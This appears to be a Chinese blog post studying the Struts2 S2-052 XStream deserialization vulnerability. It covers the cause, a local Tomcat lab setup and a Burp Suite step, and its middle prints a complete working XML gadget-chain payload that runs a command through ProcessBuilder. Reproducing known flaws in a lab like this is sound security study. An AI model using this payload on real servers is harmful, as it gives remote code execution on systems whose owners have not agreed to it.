2. 程式人生 > >struts2-052漏洞學習

struts2-052漏洞學習

阿新 發佈:2019-02-08

一、      1.strust2

Struts2是一個基於MVC設計模式的Web應用框架,它本質上相當於一個servlet,在MVC設計模式中,Struts2作為控制器(Controller)來建立模型與檢視的資料互動

2.strust2-052漏洞

Struts2 REST外掛的XStream元件存在反序列化漏洞,使用XStream元件對XML格式的資料包進行反序列化操作時,未對資料內容進行有效驗證,存在安全隱患,可被遠端攻擊

二、      1.struts2-052漏洞產生的原因

XStream元件對XML格式的資料包進行反序列化操作時,未對資料內容進行有效驗證

2.存在這個漏洞的會導致的後果

REST外掛在解析請求中的xml檔案時,呼叫了XStreamHandler,傳入的資料會被預設進行反序列化,如果當傳入的xml是個經過XStream序列化的惡意物件時,便造成反序列化漏洞

三、      漏洞的重現和利用

1.   在Windows中進行實驗

Java以前就配置好了,步驟是安裝javajdk,再配置JAVA_HOME CLASS_PATH   PATH的路徑

2.   下載tomcat並配置

下載tomcat伺服器,解壓放在G盤下,新增三個環境變數CATALINA_HOME  CATALINA_BASE  PATH路徑,在cmd中啟動startup,我在配置PATH路徑的時候把之前的path路徑沖掉了,又重新添加了會來

3.   下載存在漏洞版本的struts2其中Version2.5.0 to 2.5.12 和 Version 2.3.0 to 2.3.33都存在漏洞,我下載的是2.5.12版本的,將struts2放置在tomcat訪問的根目錄下,訪問成功如下圖

4.   攻擊payload是在網站上查到的

<map>

<entry>

<jdk.nashorn.internal.objects.NativeString>

<flags>0</flags>

<valueclass="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">

<dataHandler>

<dataSourceclass="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">

<is class="javax.crypto.CipherInputStream">

<cipherclass="javax.crypto.NullCipher">

<initialized>false</initialized>

<opmode>0</opmode>

<serviceIteratorclass="javax.imageio.spi.FilterIterator">

<iterclass="javax.imageio.spi.FilterIterator">

<iterclass="java.util.Collections$EmptyIterator"/>

<nextclass="java.lang.ProcessBuilder">

<command>

<string>calc</string>

</command>

<redirectErrorStream>false</redirectErrorStream>

</next>

</iter>

<filterclass="javax.imageio.ImageIO$ContainsFilter">

<method>

<class>java.lang.ProcessBuilder</class>

<name>start</name>

<parameter-types/>

</method>

<name>foo</name>

</filter>

<nextclass="string">foo</next>

</serviceIterator>

<lock/>

</cipher>

<inputclass="java.lang.ProcessBuilder$NullInputStream"/>

<ibuffer></ibuffer>

<done>false</done>

<ostart>0</ostart>

<ofinish>0</ofinish>

<closed>false</closed>

</is>

<consumed>false</consumed>

</dataSource>

<transferFlavors/>

</dataHandler>

<dataLen>0</dataLen>

</value>

</jdk.nashorn.internal.objects.NativeString>

<jdk.nashorn.internal.objects.NativeStringreference="../jdk.nashorn.internal.objects.NativeString"/>

</entry><entry>

<jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/>

<jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/>

</entry>

</map>

5.   在burpsuite中配置瀏覽器的代理地址和埠進行攔截瀏覽器的服務請求

6.   如果網站中存在這樣的漏洞,攻擊者可以將實現相應功能的payload放在xml的資訊體中直接上傳,而且網站對該資訊不進行檢查,所以攻擊者有很大自由去攻擊目標主機

四、      nvt是openvas的漏洞資料庫,

每一個掃描的外掛掃描的埠是固定的,當掃描任務中要掃描哪些埠就用這些埠匹配的外掛去掃描,所以是掃描漏洞的執行者

僅實驗 謹實驗

相關推薦

struts2-052漏洞學習筆記

瞭解漏洞 struts2是什麼? Struts2是一個基於MVC設計模式的Web應用框架,它本質上相當於一個servlet,在MVC設計模式中,Struts2作為控制器(Controller)來建立模型與檢視的資料互動。Struts 2是Struts的下一代產品,是在 str

struts2-052漏洞學習

一、      1.strust2Struts2是一個基於MVC設計模式的Web應用框架,它本質上相當於一個servlet,在MVC設計模式中,Struts2作為控制器(Controller)來建立模型與檢視的資料互動2.strust2-052漏洞Struts2 REST外掛

Struts2-052 漏洞復現

hal pty sha sta bject 程序 html message command s2-052漏洞復現 參考鏈接: http://www.freebuf.com/vuls/147017.html http://www.freebuf.com/vuls/1467

Apache struts2遠端命令執行_CVE-2017-9805(S2-052)漏洞復現

Apache struts2遠端命令執行_CVE-2017-9805(S2-052)漏洞復現 一、漏洞概述 Apache Struts2的REST外掛存在遠端程式碼執行的高危漏洞,Struts2 REST外掛的XStream外掛的XStream元件存在反序列化漏洞,使用XStream元件對XML格式的資料

PHP反序列化漏洞學習

exc tof target fun 反序 ring 內容 style 字符串 serialize:序列化 unserialize: 反序列化 簡單解釋: serialize 把一個對象轉成字符串形式, 可以用於保存 unserialize 把serialize序列化後的字

Struts2源碼學習(一)——Struts2中的XWork容器

sta 註入 解耦 器) equal catch 若有 pojo read   接下來記錄幾篇學習Struts2源碼的文章,希望能溫故而知新。 目錄:   1, 為什麽引入容器   2,容器的定義   3,對象創建分析   4,依賴註入分析   5,對象創建和依賴註入的

java相關漏洞學習

otp web應用 gin fun 檢測方法 post cti 文件 一次   本文來自對看雪論壇一篇文章的學習的記錄:https://bbs.pediy.com/thread-210876.htm 一.認證的測試   目前很多頁面在註冊前采用ajax,jquery無刷新判

weblogic新漏洞學習cve-2017-3506

pac 服務 sch window decode sin body for pro 一、原理:   很明顯啦,readobject又出來背鍋了,一個XML的反序列化漏洞導致的命令執行。   具體原理我看不懂java代碼的我也只能學習別人的分析。給出一篇參考文章,寫的非常詳細

關於struts2的開始學習

strust2 代碼 學習 bubuko 操作 log index.jsp pos 頁面跳轉 第一步:首先配置web.xml中的strust2的過濾器 第二步:配置index.jsp實現頁面跳轉到login.jsp 實現代碼 <a href="login.jsp"

RPO漏洞學習

div 還要 不能 AR 真的 nbsp lan rop rpo 不能直接復制markdown上來真的是痛苦,圖片還要手動上傳。 算了,不貼了。 這是PDF版https://files.cnblogs.com/files/r00tuser/RPO%E6%BC%8F%E6%B

oracle ocp 052考試學習

資源 ram set tuning 歸檔模式 per config alt role 1.數據字典存儲在SYSTEM表空間中。 2.SYSAUX可以offline: SQL>alter tablespace sysaux offline; 3.SYSTEM和SYS

PHP反序列漏洞學習

prop test 漏洞利用 serial gad struct private 讀取 public 0x00 序列化和反序列化 在PHP中,序列化和反序列化對應的函數分別為serialize()和unserialize()。 序列化:serialize()將對象轉換為字符

Struts2框架入門學習

1、Struts2框架入門 目錄 1、Struts2框架入門    1.1 什麼是Struts2框架? 1.2 為什麼用Struts2框架? 1.3 如何適用Structs2框架? 1.3.1 Struts2框架的下載 1.3

Windows系統漏洞學習總結

Windows系統常見漏洞分析   由於windows NT/2000作業系統的普及率和市場佔有率比較高,所以很容易使它成為很多黑客攻擊的目標。目前,Windows NT/2000最主要的漏洞有Unicode漏洞、.ida/.idq緩衝區溢位漏洞、Microsoft IIS

SpringMVC—Struts2攔截器學習網址整理

SpringMVC—Struts2攔截器學習網址整理         最近專案中遇到許可權相關的問題,將學習中收藏的相關網址整理,以便之後查閱,也方便其他網友交流學習。          1.

[原創]K8 Struts2 Exp 20170310 S2-045(Struts2綜合漏洞利用工具) [原創]Struts2奇葩環境任意檔案上傳工具(解決菜刀無法傳檔案或上傳亂碼等問題)

工具: K8 Struts2 Exploit組織: K8搞基大隊[K8team]作者: K8拉登哥哥部落格: http://qqhack8.blog.163.com釋出: 2014/7/31 10:24:56簡介: K8 Stru

[原創]K8 Struts2 Exp 20170310 S2-045(Struts2綜合漏洞利用工具)

上傳亂碼 mode color 平臺 功能 blog exp blank spa 工具: K8 Struts2 Exploit組織: K8搞基大隊[K8team]作者: K8拉登哥哥博客: http://qqhack8.blog.163.com發布: 2014/7/31 1

xxe漏洞學習(2)

payload1內容 就是講下面的內容傳送給存在xxe漏洞的web主機,遠端web主機就會訪問我們的vbs主機中的test.xml檔案,並執行。 test.xml內容 payload2 payload2會訪問web伺服器上的etc資料夾下面的passwd檔案,將訪問的結果賦值給

【SSH】Struts2配置檔案學習

       在Web開發專案中,都是使用web.xml來實現MVC框架的應用,如果要使用Struts的MVC模式,我們就必須在Web.xml中對Struts2進行配置,然後使用Struts.xml來

原創:struts2-045漏洞淺析

        這是小弟寫的第一篇網文,文筆一般,請大家多包涵。近期發生了很多事,使我醒悟要回歸自我的同時,要作些改變,所以開始寫網文,且把這些網文分享至個人的微信公眾號(公眾號名:永記士多)和CSDN部落格(部落格賬號:rossrocket,暱稱:永記士多)。此微信公眾號